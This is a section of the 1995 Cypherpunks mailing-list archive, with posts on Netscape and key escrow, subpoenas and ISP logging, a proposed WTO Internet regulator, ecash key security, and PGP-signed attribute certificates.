introducing an early product, then coming on with a more standard product.

   that does not change the fact the twogroups need to talk, and someone 
needs to coordiante resources.  Nothing wrong if SKIP shakes out a few 
details as they implement, but then it needs to go to the standards.





From perry at piermont.com  Thu Nov 30 10:49:07 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 1 Dec 1995 02:49:07 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <30BD716E.5F69@netscape.com>
Message-ID: <199511301752.MAA06161@jekyll.piermont.com>



Jeff Weinstein writes:
> sameer wrote:
> > 
> > http://www.cnet.com/Central/News/govt.html
> > 
> >         Bad. Very Bad. And I was almost starting to like Netscape.
> 
>   Please don't give up on us yet.  All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes.

Jeff, I'll be blunt.

I'm never going to use Netscape again if it turns out to be true. Sure
Mosaic bites, but who cares -- with enough work we can make it or
something else compete with your product if need be, and I bet that
you guys can't keep up with five hundred angry hackers.

I'll also happily run a campaign to convince everyone else on the
internet that you guys are helping to violate their privacy, because
you would be. Tell Jim Clark that if he goes through with it he has
something far worse to lose than his friends in the government -- the
billion he just got his hands on. Tell him that if he is being
misquoted he'd better make sure that retractions get printed and fast.

If you don't want "Netscape Inside" to be treated as a warning label,
you guys will reject escrow as any other ethical company would -- or
else.

Perry





From perry at piermont.com  Thu Nov 30 10:54:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 1 Dec 1995 02:54:32 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
Message-ID: <199511301758.MAA06181@jekyll.piermont.com>



Jay Holovacs writes:
> On Thu, 30 Nov 1995, Timothy C. May wrote:
> 
> > 
> > Can Netscape continue to prosper? This latest issue won't kill it,
> 
> I suspect this will unfortunately help. Stockholders are interested in 
> profits, not principles.

Netscape is currently trading somewhere like 7000 times earnings. What
profits are you talking about, precisely?

Perry





From fstuart at vetmed.auburn.edu  Thu Nov 30 10:55:30 1995
From: fstuart at vetmed.auburn.edu (Frank Stuart)
Date: Fri, 1 Dec 1995 02:55:30 +0800
Subject: [NOISE] Re: cypherpunks at ietf
Message-ID: <199511301759.LAA18735@snoopy.vetmed.auburn.edu>


[...]
>THE WWW MUST BE CONSUMER FRIENDLY IF IT IS TO SURVIVE.
>
>THE AVERAGE CONSUMER THRU A PC, OR A "DEDICATED WEB TERMINAL ON TOP OF THEIR
>TV SET", MUST BE ABLE TO USE THE WEB IN THE FUTURE TO:
>
>          1. SEARCH FOR CONSUMER GOODS; ORDER CONSUMER GOODS.
>          2. USE THE WEB FOR TELEPHONE COMMUNICATIONS AND E-MAIL
>          3. DOWNLOAD TIME SHIFT AUDIO & VIDEO
>          4. DOWLOAD MOVIES, SOFTWARE, AND P.P.V. EVENTS
>          5. HOOK ON-LINE TO VIDEO & AUDIO 
6. View text in lower case.  :>
[...]

                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law.





From rsalz at osf.org  Thu Nov 30 11:00:33 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 1 Dec 1995 03:00:33 +0800
Subject: Netscape gives in to key escrow
Message-ID: <9511301801.AA19366@sulphur.osf.org>


> Absent such clarification, we must assume he considers the
> press reports of what he said to be reasonably accurate.

Speaking for myself, I wouldn't feel comfortable assuming that Clark's
priorities vis-a-vis correcting a handful of misquotes were as high as
I might want them to be.

So I wouldn't take this position (fun and full of righteous wrath though
it may be).  Instead I'd be optimistic and say "he hasn't gotten around
to it yet."  Just as I figure Elvis will eventually tell all those tabloids
that he and JFK were playing cards with Hoffa in Bimini all these many years.
	/r$






From opsan at gnn.com  Thu Nov 30 11:21:07 1995
From: opsan at gnn.com (Michael Coates)
Date: Fri, 1 Dec 1995 03:21:07 +0800
Subject: cypherpunks at ietf
Message-ID: <199511301820.NAA06599@mail-e1a.gnn.com>


>> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN
> ACCURATE
>> SEARCH ON THE WEB.
>>
>> [...]
>>
>> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE
> WEB,
>> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.
>
>Gee:  Someone who has not learnt to use the caps key on his computer
>cannot do accurate searches, so will everyone else please get off
>the net.
>
>>
>> [...]
>>
>> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
>> PLACING ON THE WEB.
>
>Pleasant comic relief.
>

My guess is; he simply wanted to embarass himself.  Don't they have karaoke 
bars for that sort of thing?






From attila at primenet.com  Thu Nov 30 11:21:10 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 03:21:10 +0800
Subject: SUN, UNIX, et al versus MS standards
In-Reply-To: <199511301517.JAA14087@spirit.sctc.com>
Message-ID: <Pine.BSD.3.91.951130175032.7762C-100000@usr3.primenet.com>



    my only comment on Sun's non-portable software is that it
**used-to-be** a case of excessive Berzerkely attitude. Solaris is an
effort, and a very credible effort to meet industry and consumer
standards.  The code is compatible to Sys V R4, and on x86 implementations
will execute Sys V R4 binaries, as well as SCO binaries which opens that
whole set of markets (software availability). 

   at the Solaris 2.1 and 2.2 levels, Sparc Solaris and X86 Solaris were
not even compatible to each other. I just took 200K+ lines of code from a
Sys V package and ported it to both Sparc and X86 Solaris 2.4 --perfect.
The code also had defines for 4.2+ BSD --those also compiled.  Take your
pick. 

   Sun got the message on standards; their respone was to meet both; and,
they have done a good job of it. Secondly, there is no such thing as
bug-free code --that's like free-lunch and it's all relevant.  Which would
you rather have? patches available on the net, or be forced to upgrade to 
new bugs with MS plus a few more overkill features.

   Again, my point is: why bad mouth Sun?  This is what has fractured UNIX
in the market place and gives the MS assholes the ability to not only
stomp UNIX with reviews which always ask "...which flavour of UNIX is it
this month?"  but, even worse, it gives Gates an opportunity to set YET
ANOTHER **PROPRIETY** MS STANDARD --that does not run securely with the
mainline.  Do you wish to give Microsoft, whose intentions have never
waivered from getting a piece of every transaction in the world,
**complete** control over everything? on every desktop?  

In other words, do you want to see Microsoft, and possibly only
Microsoft/Intel, in the marketplace. Network managers complained about the
Ray Noorda cult, but wait until everybody is forced to join the Bill Gates
cult. 

   SUN is not the enemy; MS is.  Do you wish to live with MS who,
according to the head cultist, **never** issues a maintenance release
since the software does not have bugs.  Just updates, **expensive**
updates, which fix some bugs, add a few overkill features, and introduce
new bugs. 

   Is there any really good software for **applications** on UNIX at
even close to windows compatible prices --let alone the wealth of material
available.  Sure WABI gets the main productivity pieces, but PagerMaker
and Corel are frozen at Version 5 for WABI.

   Personally, I use OS/2 as the front end to my Suns;  OS/2 is likewise
frozen at W3.1 level software --but at least WinOS2 does not crash my
entire system or network.  I want some of the features in the W95 versions
of Corel and Pagemaker, such as HTML --they will never be made available
for either OS/2 of UNIX. 

   In other words, we need to stop bitching, and start supporting the
alternative systems --constructively.  It all comes back to software, and
even us techo-freaks, or whatever we are with the long hair blowing all
over, need to think about the people who want a simple answer and MS gives
the glitter --if we do not help sustain the alternatives, we will not even
have the luxury of decent hardware. Even GNU has a W95 and an NT **full
pack**. 






From cme at TIS.COM  Thu Nov 30 11:23:50 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 1 Dec 1995 03:23:50 +0800
Subject: The future will be easy to use
In-Reply-To: <Pine.SUN.3.91.951130123535.3869B-100000@rwd.goucher.edu>
Message-ID: <9511301819.AA11933@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 30 Nov 1995 12:39:50 -0500 (EST)
>From: Jon Lasser <jlasser at rwd.goucher.edu>

>  I'm positing someone's 
>using a stolen credit card number. [...] If I'm a merchant, I'm 
>going to really want (if I know it's possible) to ship only to what's 
>been "the address on the card" (or, in reality, in the database under the 
>card's number) so that it's harder (not impossible, harder) for people to 
>defraud me.

I'm not sure that's the reason, but there are merchants who insist on
shipping to the card's billing address.  This happens to me when I'm using
a credit card by phone, so the merchant has no signature on file.  For lack
of that proof that I'm me (as opposed to some inmate in a local prison
(actual case I heard about)), if they ship goods to the same address that
writes the actual check for the goods, there's added safety.

For a world with my non-certificates, this is achieved by a pair of
attribute statements:


- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank

- -----BEGIN PGP SIGNATURE-----
[...]   signature with First Security Bank's key (bc2cb0...)
- -----END PGP SIGNATURE-----



- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: I receive packages (especially UPS and FedEx) at:
	Carl Ellison
	c/o Trusted Information Systems
	3060 Washington Road
	Glenwood MD 21738
	(301) 854-6889

- -----BEGIN PGP SIGNATURE-----
[...]   signature with my key (e05c60...)
- -----END PGP SIGNATURE-----


The first gives the necessary hook for the merchant to establish that key
e05c6... has money to spend, if the merchant feels the need to check.  The
second establishes a shipping address for that key.

Note that the word "I" in the second attribute statement means "the person
who knows how to make the attached signature with key (e05c60...)"  rather
than "Carl Ellison" (although, in this case, they're the same).

The shipping address could be anonymous:

- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: I receive USPS packages at:
	P.O. Box 360
	Glenwood MD 21738

- -----BEGIN PGP SIGNATURE-----
[...]   signature with my key (e05c60...)
- -----END PGP SIGNATURE-----



 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML31ZFQXJENzYr45AQHk1QQAplkBXXZ+tSiBA2B/0FbJtFkYabNJcC7T
lkDEG/jZVANhonX5KKRgwKwzg1cfMCAlbbe0s+3HLTMg5yj9Fw4UD/U0mgZ31HGo
16iqbOqoVpknI5qSHVH/p2QMKHb3N1wKOEH3VJc21mkO+5W77p0mXywvW5zJrRHR
qllQdZ3Xde0=
=UU9f
-----END PGP SIGNATURE-----

BTW -- I don't have a PO Box at Glenwood.  (cme)






From opsan at gnn.com  Thu Nov 30 11:26:38 1995
From: opsan at gnn.com (Michael Coates)
Date: Fri, 1 Dec 1995 03:26:38 +0800
Subject: cypherpunks at ietf
Message-ID: <199511301821.NAA17770@mail-e1a.gnn.com>


>> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN
> ACCURATE
>> SEARCH ON THE WEB.
>>
>> [...]
>>
>> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE
> WEB,
>> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.
>
>Gee:  Someone who has not learnt to use the caps key on his computer
>cannot do accurate searches, so will everyone else please get off
>the net.
>
>>
>> [...]
>>
>> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
>> PLACING ON THE WEB.
>
>Pleasant comic relief.
>

My guess is; he simply wanted to embarass himself.  Don't they have karaoke 
bars for that sort of thing?






From EALLENSMITH at ocelot.Rutgers.EDU  Thu Nov 30 11:27:38 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Fri, 1 Dec 1995 03:27:38 +0800
Subject: Attribute-testimony example (was Re: The future will be easy touse)
Message-ID: <01HY987RZFD48WYZNO@mbcl.rutgers.edu>


From:	IN%"cme at TIS.COM"  "Carl Ellison" 30-NOV-1995 12:34:35.18

Once an element of that set is identified, it can be assigned a codeword
(to make parsing easier).
----------
	How about an email address? Or a URL? Those can be autodetected easily
enough. Plus, the email one could be used to automatically use the
appropriate key if reading something from a particular address (whether for
decryption or for signature verification). If there are more than one with
that address, try all of them and if one turns up looking right (looks like
email headers, for instance) use that decryption. That last is even easier with
the signature verification, and that can show up the user-specified portion of
the field so as to remind you who's sent the message. Sorry if this has been
thought of (and suggested) before... it is kind of obvious.
	-Allen





From attila at primenet.com  Thu Nov 30 11:45:15 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 03:45:15 +0800
Subject: "Got a subpoena?"
In-Reply-To: <199511301704.JAA23295@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951130185007.7762H-100000@usr3.primenet.com>


On Thu, 30 Nov 1995, sameer wrote:

> > "finessing" laws will become more important.  In short, they WILL have
> > a subpoena--then what?
> 
> 	Then they'll find out that I don't have any information that
> could help them, anyway.
> 
> 	sameer
>
   yes, and that is where the absurdity of American law enters in, they
**charge** you with conspiracy!  --or destroying evidence of a crime (by
failing to keep logs)  --or even better, aiding and abetting the
commission of a crime as part of the "chain" of the crime. 

   and, you better believe they do whatever they want. and do not ignore
RICO, because if the "alledge" there were six or more conspirators, or
participants, they are starting tpo use RICO --and you can go away for
life without parole for even a simple "crime." 

   let me put it this way --been there, done that.  

   however, screw'm, if we dont put our asses on the line, not only will 
America in general not have freedom of speech, but we will not either. I 
do not necesarily condone the militias, but I certainly will not 
interfere with their rights 

it may not be too long before the words of Thomas Jefferson may ring true:
the purpose of the militia [a citizens' militia] is to, God forbid,
overthrow a state which has become tyrannical. 

 ****								   ****
 the government who fears weapons in the hands of its citizens, should!
 ****								   ****





From rpandya at netcom.com  Thu Nov 30 12:01:16 1995
From: rpandya at netcom.com (Ravi Pandya)
Date: Fri, 1 Dec 1995 04:01:16 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199511301927.LAA12863@netmanage.com>


If you're looking for an alternative Web browser for Windows, we just made
ours available for free at www.netmanage.com. It's fast and reliable, and
supports HTML 3.0, inline video, software distribution, VRML (NT version),
Real Audio, TrueSpeech, etc.

Ravi

**** Home of Chameleon TCP/IP Applications for Windows and ****
**** ECCO Personal & Group Information Manager for Windows ****

Ravi Pandya
Director of ECCO Engineering
NetManage Inc
2340 130th Avenue NE
Bellevue, WA 98005
206 867 3722 voice
206 885 0127 fax
ravip at netmanage.com






From cme at TIS.COM  Thu Nov 30 12:03:51 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 1 Dec 1995 04:03:51 +0800
Subject: Attribute-testimony example (was Re: The future will be easy touse)
In-Reply-To: <01HY987RZFD48WYZNO@mbcl.rutgers.edu>
Message-ID: <9511301916.AA17069@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 30 Nov 1995 13:33 EDT
>From: "E. ALLEN SMITH" <EALLENSMITH at mbcl.rutgers.edu>

>Once an element of that set is identified, it can be assigned a codeword
>(to make parsing easier).
>----------
>	   How about an email address? Or a URL? 

In this case, I was talking about an abbreviation for an attribute
rather than for a person --  e.g.,

	"checking-account: <number>,<bank>"

standing, for example, for

	"The person (entity) capable of signing with the signed-key 
identified above is authorized to withdraw money from checking account
number <number> at <bank>."


However, in offline mail I just had this interchange:

>>Date: Thu, 30 Nov 1995 12:47:28 -0500 (EST)
>>From: Jon Lasser <jlasser at rwd.goucher.edu>
>
>>Maybe it is just out of habit.  But there's another aspect, not looking 
>>at other people, but looking at oneself:
>>
>>"This is _my_ key."
>>
>>"But my name isn't on the key."
>>
>>"The key says I belong to it."
>>
>>"Hey!  I'm not just a number!"
>
>I think you're exactly right here.  That's the problem.
>
>Perhaps we need to include the person's name in the keyID.
>
>So instead of: 
>
>Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
>
>we could use:
>
>Signed-Key-ID: Carl Ellison (e05c601c4ec4af3aeb54a53171ed65da)
>

or

Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da (Carl Ellison)

to follow the SMTP example, or

Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da (Carl Ellison <cme at tis.com>)

to follow the PGP example.


In this case, the text attached to the key is optional -- but there for the
people who feel attached to their names.  It's left off (or replaced with a
handle) for folks who want anonymity.

The fact remains that the key is the source of authority here.  The name
acquires validity from the key, not the other way around, and that might
upset some people who bother to think about it.  However, those who prefer
to think the name is important can view the key hash as an added field
making the name unique -- with the extra added bonus of being tied strongly
to a public key.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML4CoVQXJENzYr45AQFvJQQAszQbHHIXlOVFpdBv3K/J6f3FmCBoSvhX
Fpy9T0OJAH2pndzH1cZLVTQzS+j/p4tY5P6YAlF+VS047T6jQqF31Kn1fIUlEjzw
0/t/W+7BQ+IktrrNtyJfEx5rFYKUg6rViTg3UF+knocBIMTRfm0EbuMkv7hCN5Ho
iE0n9FZ+XIc=
=e+iE
-----END PGP SIGNATURE-----





From edge at got.net  Thu Nov 30 12:16:42 1995
From: edge at got.net (Jay Campbell)
Date: Fri, 1 Dec 1995 04:16:42 +0800
Subject: "Got a subpoena?"
Message-ID: <199511302056.MAA07241@you.got.net>


>> "finessing" laws will become more important.  In short, they WILL have
>> a subpoena--then what?
>
>	Then they'll find out that I don't have any information that
>could help them, anyway.

What about a court order to (a) start comprehensive logging, and (b) not
tell anyone under penalty of ______ .
--
   Jay Campbell                edge at got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."






From jya at pipeline.com  Thu Nov 30 12:20:59 1995
From: jya at pipeline.com (John Young)
Date: Fri, 1 Dec 1995 04:20:59 +0800
Subject: Netscape, Corporations, and GAK Support
Message-ID: <199511301940.OAA25768@pipe9.nyc.pipeline.com>


   Picking up on Tim's and Atilla's comments on Netscape, GAK,
   a WTO czar and government regulation of security on the
   Net:

   Jim Clark's speech was probably a trial balloon, to see
   what the reaction would be. Remember that the NIST
   conference on KE is December 5.

   It would make sense for the corporations to welcome
   application of police power to handle threats to public
   order, in cyberworld like the other. That way they reduce
   culpability for failures of their private security systems,
   as they do on private real estate property.

   Key escrow requires someplace for the buck to stop beyond
   several private pitstops, and that is usually Uncle Sugar
   when no other party has the resources to withstand
   sustained, substantial, culture-wide risk -- as, say, in
   the financial realm. Internationally, the same need exists.

   Probably the corporations  would like to work in concert
   with governments on this, so no single firm, or nation,
   gets stigmatized, or wounded and prey to vultures -- as
   Netscape was with the brute hack, and as Microsoft and
   others have been with other attacks on their lightly
   guarded property, or as the US might be if it does not work
   out international agreements.

   Moreover, it has been noted here that government contracts
   are crucial for a new company -- for testing, for
   credibility, for prestige. All the major players already
   have such vital contracts -- indeed most would not have
   thrived without them -- so why would Netscape, and its 
   investors, not want them too?

   It's possible that Netscape was selected to sound off on KE
   to see if it could play with the Big Boys -- take the heat,
   pass initiation, qualify for the Bohemian Grove bear hugs
   of assured stability, growth and profits.
   
   Could be, though, that after getting stable R/E for his 
   backers, Jim will be confident enough to join Pixar in that 
   rhumba risk of mercurial, evanescent mass-marketers.

   That's not to be believed now at 7,000 times earnings.










From hallam at w3.org  Thu Nov 30 12:22:42 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 1 Dec 1995 04:22:42 +0800
Subject: WTO an even worse possibility as Inet regulator
In-Reply-To: <Pine.BSD.3.91.951130184221.7762G-100000@usr3.primenet.com>
Message-ID: <9511301947.AA05400@zorch.w3.org>



>  a very credible white paper is circulating for the WTO to establish an 
>internet CZAR to regualate the Internet and level the playing field world 
>wide. 

>   personally, the Feds and the FCC are bad enough --now they want to 
>have a **global** bureaucracy play god  -???


Depends on what the role of the Czar is. If it is to stop sillyness like 
border disputes and keep national governments out of the loop then it
could be a good thing. If they want to regulate it is a bad thing.

WTO is mainly known for the GATT which they brokered. This is basically
an agreement amongst national governments to be "hands off" in their
tariff regulations. 

There is the potential for governments to regulate the Internet. It is
in everyone's interest to keep hands off but if one starts to regulate
then it is in others interests to regulate. The general soulution to
prisoners dilema games is to form some type of alliance. It is not
possible to form alliances in classical prisoners dilemas since they
are restricted to a single dilema at a time. Givernments are involved
with multiple dilemas and hence have multiple agreements. The main reason to
keeo a treaty is that the credibility of government depends on keeping 
treaties. Thus a treaty can solve a prisoners dilema problem since 
the gain from breaking one treaty is more than offset by the potential loss
through other sides abrogating other treaties.


I suspect that the role of an Internet Czar would be mainly ensuring that 
fat Internet pipes arrived throughout the third world. George Sorros has
been very active in this area, he paid for much of the infrastructure
development into Eastern Europe. If we could persuade Bill Gates that his 
mission in life was to cable Africa to the Internet somehow we might have the
whole planet online before 2000.

I would not be too worried about WTO banning crypto or attempting looney
tune ideas like insisting on OSI protocols. The UN generally does some very 
worthwhile work in allocating radio frequencies and such like and has done so 
for many years without problems. They allocate areas of the clarke belt for 
satelites and do all sorts of mundane tasks.


One of the odd things about power is that the larger the scale the more mundane 
the decisions. At the local level councillors decide to build or close schools 
and hospitals. At the global level negotiations are held on the size of holes in 
fishing nets and the exact specifications of ball bearings.

If people want to see the Federal government weakened in power the only way to 
do so is to make it ceed power both upwards and downwards. A national speed 
limit may be a bad idea (I personally think what was wrong was 55mph) but 
national standard roadsigns is a good idea. International standard roadsigns are 
a better idea still. 


		Phill.





From sameer at c2.org  Thu Nov 30 12:28:04 1995
From: sameer at c2.org (sameer)
Date: Fri, 1 Dec 1995 04:28:04 +0800
Subject: "Got a subpoena?"
In-Reply-To: <199511302056.MAA07241@you.got.net>
Message-ID: <199511301946.LAA12448@infinity.c2.org>


> 
> What about a court order to (a) start comprehensive logging, and (b) not
> tell anyone under penalty of ______ .

	Aren't court orders part of the public record? I don't quite
know how this would work. I don't think they can keep me from telling
people that I've started comprehensive logging, or at least keep it
from being founnd out. (Legally, that is. I'm sure they could always
use an approach like threatening to audit me every year, threatening
my family, etc.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From attila at primenet.com  Thu Nov 30 12:32:02 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 04:32:02 +0800
Subject: WTO an even worse possibility as Inet regulator
Message-ID: <Pine.BSD.3.91.951130184221.7762G-100000@usr3.primenet.com>



   based on an article from the (London) Financial Times [available from
John Young at jya at pipeline.com with subject line WAY_lad],

   a very credible white paper is circulating for the WTO to establish an 
internet CZAR to regualate the Internet and level the playing field world 
wide. 

   personally, the Feds and the FCC are bad enough --now they want to 
have a **global** bureaucracy play god  -???

   are we ready to go back to UUCP?








From mark at unicorn.com  Thu Nov 30 12:44:42 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Fri, 1 Dec 1995 04:44:42 +0800
Subject: Credit card theft Re: The future will be easy to use
Message-ID: <Pine.3.89.9511301809.A9289-0100000@unicorn.com>


On Thu, 30 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

> What if it's an ecash password getting stolen? Who's liable? (lemme 
> guess, your money's gone, tough luck!)

>From what I remember of the contract, that's true, the bank appear to take
no liability for ecash (check the WWW page for the real details). As I'm
not likely to have more than about $ 50 of ecash at any time, I'm not
*that* concerned about it. Big users could transfer payments back into
their dollar account ASAP to avoid most of these problems, just keeping
enough in the ecash account to make any payments that may be required. 

It's not really any worse than physical cash, as long as the software is
reliable, which it appears to be (I've lost payments in the past, but 
cancelling them has always worked to get the money back).

> Disclaimer: I don't have a marktwain account at the moment, so I can't
> say a thing about the security of the system. I wish them the absolute best 
> of luck.

I do, and yes, from conversations with them it appears that if someone
gets your secret key and password they can clear out all the money from
your ecash account. This is potentially a real problem for shops, which
have to have a secret key file on the machine they run from. Currently
this even applies to shops that only *accept* ecash, though there may be
an accept-only server out sometime, and I found a way to delete the secret
key itself from the file and still have it work (I forget the exact
details, you basically zero 256 bytes of the file that contain the key,
which appears to be 768-bits according to the debug output, so I don't
know what the extra bits are used for). 

Shops that pay out need to have an *unencrypted* secret key on the server,
which is scary, but there's not much you can do about it if you're running
on an insecure server...  The only way around it that I can see would be
to withdraw ecash using a secure machine and upload it to your server, so
that the shop could make payments until the ecash supply was depleted and
then you'd manually have to withdraw more. Then if someone broke into your
account they'd get the ecash, but not the key, and you could limit your
exposure to the amount you uploaded at any one time. I'll probably be
doing that once the check I mailed over gets into my ecash account. 

This is strictly my understanding of the system based on what I've been
told, so hopefully if I'm wrong then someone from DigiCash will correct
me.

	Mark






From tcmay at got.net  Thu Nov 30 12:45:27 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 04:45:27 +0800
Subject: Netscape gives in to key escrow
Message-ID: <ace34e4b0f0210044da9@[205.199.118.202]>


At 7:26 PM 11/30/95, Ravi Pandya wrote:
>If you're looking for an alternative Web browser for Windows, we just made
>ours available for free at www.netmanage.com. It's fast and reliable, and
>supports HTML 3.0, inline video, software distribution, VRML (NT version),
>Real Audio, TrueSpeech, etc.

This shows the price Netscape could pay for taking a pro-surveillance,
anti-privacy stance.

Various alternatives to Netscape exist (even on the Mac), despite attempts
to make "Netscape-enhanced-encoding" (or whatever it's called) the
standard. I expect alternative browsers will catch up fairly quickly.

(As an aside, and based on my past experiences at Intel during its
rapid-growth phase, it may be tough for Netscape to keep people motivated
and focused on development, what with all the "distractions" of a stock
price of $140 when it was expected to go public at $14. CNBC reported
yesterday that several _secretaries_ at Netscape have cashed in $600K stock
options....I can imagine a lot of folks are eager to leave to enjoy their
new wealth, but will stick around for the future stock options. This
becomes a real drag on productivity, based on my experiences and those of
my friends at various other start up companies.)

I also expect that this pro-surveillance, anti-privacy "stumble" by Jim
Clark will either be quickly "clarified" (but perhaps nothing really
changed), or Netscape will suffer a black eye in public relations, with
many "Cypherpunk"-type people adopting a "Just Say No to Netscape!" stance.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From hallam at w3.org  Thu Nov 30 12:45:49 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 1 Dec 1995 04:45:49 +0800
Subject: Netscape, Corporations, and GAK Support
In-Reply-To: <199511301940.OAA25768@pipe9.nyc.pipeline.com>
Message-ID: <9511302008.AA05390@zorch.w3.org>



Folks, lay of Netscape on this one. _EVERYONE_ is doing Terissa for the feds to
use themselves. There are reporting requirements (FOI) which most people on this 
list seem to enjoy which make the privacy issue moot. There are other people who do 
not want to have non escrowed data flowing over their internal nets, nuclear 
installations etc.

When I was involved in the site security area there was no way I would allow 
messages to be bouncing round the internal net which I could not read. They
might well be from trojan horses planted inside the net sending data out.

Key escrow is not bad in itself. It is the idea that individuals be forced to 
use it for private conversations that is the bad idea.


If people want to argue "make the technology avaliable and it will be abused" then
let them. Just remember that we normally argue the other side of the case.


		Phill








From tedwards at Glue.umd.edu  Thu Nov 30 12:52:05 1995
From: tedwards at Glue.umd.edu (Thomas Grant Edwards)
Date: Fri, 1 Dec 1995 04:52:05 +0800
Subject: whither NetBill? (micropayments)
Message-ID: <Pine.SUN.3.91.951130152758.1025A-100000@volt.isr.umd.edu>



NetBill (http://www.ini.cmu.edu/netbill/) appears to be a great way for 
implementing micropayments.  Does anyone know what the deal is, or did 
Visa sign on just to keep it from happening?

-Thomas






From attila at primenet.com  Thu Nov 30 13:33:20 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 05:33:20 +0800
Subject: WTO an even worse possibility as Inet regulator
In-Reply-To: <9511301947.AA05400@zorch.w3.org>
Message-ID: <Pine.BSD.3.91.951130202218.7762O-100000@usr3.primenet.com>


On Thu, 30 Nov 1995 hallam at w3.org wrote:

> 
> >  a very credible white paper is circulating for the WTO to establish an 
> >internet CZAR to regualate the Internet and level the playing field world 
> >wide. 
> 
> >   personally, the Feds and the FCC are bad enough --now they want to 
> >have a **global** bureaucracy play god  -???
> 
> 
> Depends on what the role of the Czar is. If it is to stop sillyness like 
> border disputes and keep national governments out of the loop then it
> could be a good thing. If they want to regulate it is a bad thing.
>
   	<attila>  

	1. unfortunately, the state intent is to regulate.

 	2. have you ever seen a bureaucracy that does not turn to 
           regulation one in has the power?  (unless they were asleep <G>)

> WTO is mainly known for the GATT which they brokered. This is basically
> an agreement amongst national governments to be "hands off" in their
> tariff regulations. 
> 
	<attila sez>  but WTO is also accumulating a rather larger 
    bureaucracy and is challeng Uncle Sam on severl major unilateral
    actions.  They will have the power of international courts which,
    today, the U.S.  can ignore, but at great international bad publicity
    in a time where he have few enough friends as it is --if the U.S.
    slips into the abyss which the incompetent beltway maggots have been
    building for 50 years, the US' current "friends" will be first in line
    to screw us over --and it will be by the WTOs and world courts, or the
    Rockefeller NWO --read UN, and UN troops in America. 

	As slippery and somewhat slimy as Gingrich is, so far he has been
    the only one to put his career on line admitting to the fact the
    current overstuffed bureaucracy *does not work* --now, if he could get
    a clue other than get the government out of your nose and really
    deliver (impossible given Clinton's retrenchment in Fair Deal
    idealism)....

> There is the potential for governments to regulate the Internet. It is
